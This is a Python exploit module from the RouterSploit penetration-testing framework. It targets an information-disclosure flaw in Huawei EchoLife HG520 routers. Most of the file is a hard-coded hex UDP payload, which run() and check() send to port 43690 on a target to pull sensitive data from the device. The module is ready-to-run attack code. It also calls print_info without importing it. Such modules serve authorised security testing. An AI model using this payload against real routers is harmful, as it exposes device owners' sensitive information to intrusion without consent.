import socket

from routersploit import (
    exploits,
    print_status,
    print_error,
    print_success,
    mute,
)


class Exploit(exploits.Exploit):
    """
    Exploit implementation for Huawei EchoLife HG520 devices. If the target is vulnerable it is possible to retrieve sensitive information.
    """
    __info__ = {
        'name': 'Huawei HG520 Information Disclosure',
        'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity. If the target is vulnerable it is possible to retrieve sensitive information.',
        'authors': [
            'hkm',  # vulnerablity discovery
            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
        ],
        'references': [
            'https://www.exploit-db.com/exploits/12298/',
        ],
        'devices': [
            'Huawei HG520',
        ],
    }

    target = exploits.Option('', 'Target IP address')  # target address

    payload = ("\x00\x01\x00\x00\x0e\x00\xeb\x03\x7f\x0a\x5f\x00\x10\x00\x02\x00\x13\x00\x00\x00\x50\x02\x00\x00\xe0\xf4\x12\x00\xb0\xaa\x19\x00"
               "\x18\x87\x15\x00\x84\xfb\x12\x00\x00\x00\x00\x00\x78\x76\x4b\x02\xa8\x87\xec\x01\x00\x00\x00\x00\x38\x12\x19\x00\x10\xf5\x12\x00"
               "\x32\x00\x00\x00\x34\x60\x5d\x77\x00\x00\x00\x00\x84\xfb\x12\x00\x01\x00\x00\x00\xb8\x88\x24\x00\xf8\x8f\x19\x00\x0d\x00\x00\x00"
               "\x18\x94\x19\x00\xf8\x98\x19\x00\x74\xf4\x12\x00\x84\xf6\x12\x00\x4c\xf7\x12\x00\x00\xe9\x91\x7c\x10\x6f\x94\x7c\x00\x00\xff\xff"
               "\xae\x2c\x92\x7c\xe4\x2c\x92\x7c\x51\x2d\x92\x7c\x58\x2d\x92\x7c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\xf7\x12\x00"
               "\x44\xf5\x12\x00\xb0\x65\x92\x7c\xf8\xf7\x12\x00\x00\xe9\x91\x7c\x60\x2d\x92\x7c\xff\xff\xff\xff\x58\x2d\x92\x7c\x12\x66\x92\x7c"
               "\x01\x00\x00\x00\x76\x02\x48\x0d\xee\x64\x92\x7c\x00\x00\x00\x00\x9c\x70\x40\x00\x00\x00\x00\x00\x34\x60\x5d\x77\x30\x28\x1f\x00"
               "\x00\x00\x00\x00\x00\x00\x00\x00\x70\x2f\x15\x00\x78\x01\x15\x00\x00\x00\x00\x00\x78\x2f\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00"
               "\x00\x00\x00\x00\x54\xf8\x12\x00\xa8\x87\xec\x01\x50\xf8\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x02\x48\x0d\x00\x00\x08\x02"
               "\xe4\xf5\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\xf8\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x00\x00\x00\x00"
               "\x00\x00\x00\x00\x00\x00\x00\x00\x5c\xf6\x12\x00\x0d\x00\x00\x00\xa2\x6f\x94\x7c\xf8\x98\x19\x00\x78\x76\x4b\x02\xd8\x93\x19\x00"
               "\x60\x90\x19\x00\x0d\x00\x00\x00\xf8\x8f\x19\x00\x84\xfb\x12\x00\x28\xf6\x12\x00\x30\xd4\x4c\x77\x48\xf7\x12\x00\x00\xe9\x91\x7c"
               "\x94\xf6\x12\x00\x94\xf6\x12\x00\xd8\x93\x19\x00\xec\x73\x94\x7c\x70\xe3\x4b\x02\x00\x00\x00\x00\x00\x00\x15\x00\x00\x00\x00\x00"
               "\x00\x00\x00\x00\x0f\x00\x41\x00\x13\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\xf8\x98\x19\x00\xb4\xf9\x12\x00\xf8\x8f\x19\x00"
               "\x58\xf7\x12\x00\x3d\x00\x92\x7c\xf6\x89\xec\x01\x00\x00\x00\x00\xe8\x06\x02\x00\x54\xfc\x12\x00\x01\x00\x00\x00\x01\x00\x00\x00"
               "\x00\x00\x00\x00\x12\xe1\xf8\x09\x7d\x0b\x00\x00\x72\xab\x56\x48\x3f\xe1\xbe\x07\x15\x04\x92\x7c\x1e\x04\x92\x7c\x00\x00\x00\x00"
               "\x00\x00\x00\x00\x00\xe0\xfd\x7f\xeb\x50\xd7\xc6\x1a\x00\x00\x00\x00\xe0\xfd\x7f\x00\x10\x91\x7c\x00\x00\x00\x00\x00\x00\x01\x00"
               "\x00\xe0\xfd\x7f\x5c\xf7\x12\x00\xe6\x45\x92\x7c\x40\x04\x92\x7c\x00\xd6\x98\x7c\x48\xf7\x12\x00\x40\x12\x19\x00\x8a\x74\x94\x7c"
               "\x2c\xf7\x12\x00\xa8\x87\xec\x01\x00\x00\x00\x00\x00\x00\x15\x00\x0e\x00\xeb\x03\x80\x0a\x5f\x00\x64\x46\x00\x10\xfe\xf7\x12\x00"
               "\xb0\x44\x00\x10\x04\x00\x00\x00\x8c\xf7\x12\x00\xd3\x7e\x92\x7c\xfe\xf7\x12\x00\x31\x00\x00\x00\x00\x00\x00\x10\xa0\x45\x00\x10"
               "\x64\x46\x00\x10\x00\x00\x00\x00\x01\x00\x00\x00\xfc\xf7\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x10\xe0\x00\x00\x10"
               "\x64\xf7\x12\x00\x01\x00\x00\x00\x9c\xf7\x12\x00\x65\x03\x92\x7c\x00\x00\x00\x10\x00\x00\x00\x00\x58\xf8\x12\x00\x9a\x7d\x92\x7c"
               "\x00\x00\x00\x10\xfe\xf7\x12\x00\xf8\xf7\x12\x00\xf8\xf7\x12\x00\xfe\xf7\x12\x00\x3f\x7e\x92\x7c\x78\xb1\x98\x7c\xe9\x7d\x92\x7c"
               "\x8c\x70\x40\x00\x9c\x70\x40\x00\xff\xff\x00\x00\x00\xd0\xfd\x7f\xe0\x47\x25\x00\x08\xe4\x80\x7c\xb0\x44\x00\x10\x6c\xe4\x80\x7c"
               "\xf0\x47\x25\x00\xa8\xf8\x12\x00\x00\x00\x00\x10\x00\x00\x00\x00\xfc\xf7\x12\x00\xfc\xf7\x12\x00\x00\x00\x00\x00\xfe\x04\x00\x00"
               "\xd0\x41\x25\x00\x00\x1b\x00\x10\x00\x00\x67\x65\x74\x41\x64\x73\x6c\x53\x74\x61\x74\x75\x73\x00\x3d\x00\x92\x7c\xea\x1b\x80\x7c"
               "\x00\x00\x15\x00\x00\x00\x00\x00\xfa\x1b\x80\x7c\x64\x5d\x47\x00\x9c\x70\x40\x00\x9f\xac\x80\x7c\x4e\x02\x50\x02\xa8\x87\xec\x01"
               "\x16\x00\x18\x00\x00\xdc\xfd\x7f\xef\xfa\x00\x00\xb4\xf7\x12\x00\xa8\x87\xec\x01\xa8\xf9\x12\x00\x00\xe9\x91\x7c\xf0\x7d\x92\x7c"
               "\xff\xff\xff\xff\xe9\x7d\x92\x7c\xa0\x7e\x92\x7c\x00\x00\x00\x10\x94\xf8\x12\x00\x00\x00\x00\x00\xa8\xf8\x12\x00\x01\x00\x00\x00"
               "\x9c\xf8\x12\x00\x6e\xae\x80\x7c\x9c\xf8\x12\x00\x80\xae\x80\x7c\x00\x00\x00\x10\x00\x00\x00\x00\x64\x5d\x47\x00\x9f\xac\x80\x7c"
               "\x0d\x00\x0e\x00\x8c\x70\x40\x00\xc4\xf8\x12\x00\xd8\xa0\x00\x66\x00\x00\x00\x10\x00\x1b\x00\x10\x84\xfb\x12\x00\x54\xfc\x12\x00"
               "\x01\x00\x00\x00\x68\xf8\x16\x00\xdc\xf8\x12\x00\x44\x4a\x0f\x77\xf4\xf8\x12\x00\x3b\xa0\x00\x66\x9c\x70\x40\x00\x01\x00\x00\x00"
               "\xec\xf8\x12\x00\xf0\xf8\x12\x00\xe8\xf8\x12\x00\x84\xfb\x12\x00\x54\xfc\x12\x00\x84\xfb\x12\x00\x00\x1b\x00\x10\x00\x00\x00\x00"
               "\xb8\xf9\x12\x00\xcb\x70\x40\x00\x9c\x70\x40\x00")

    def run(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(10)
        
        print_status("Sending exploit payload")
        sock.sendto(self.payload, (self.target, 43690))

        try:
            print_status("Waiting for response")
            response = sock.recv(1024)
        except socket.timeout:
            print_error("Exploit failed - device seems to be not vulnerable")
            return

        if len(response):
            print_success("Exploit success")
            print_info(response)

    @mute
    def check(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(10)
        sock.sendto(self.payload, (self.target, 43690))

        try:
            response = sock.recv(1024)
        except socket.timeout:
            return False  # target is not vulnerable
        
        if len(response):
            return True  # target is vulnerable

        return False  # target is not vulnerable
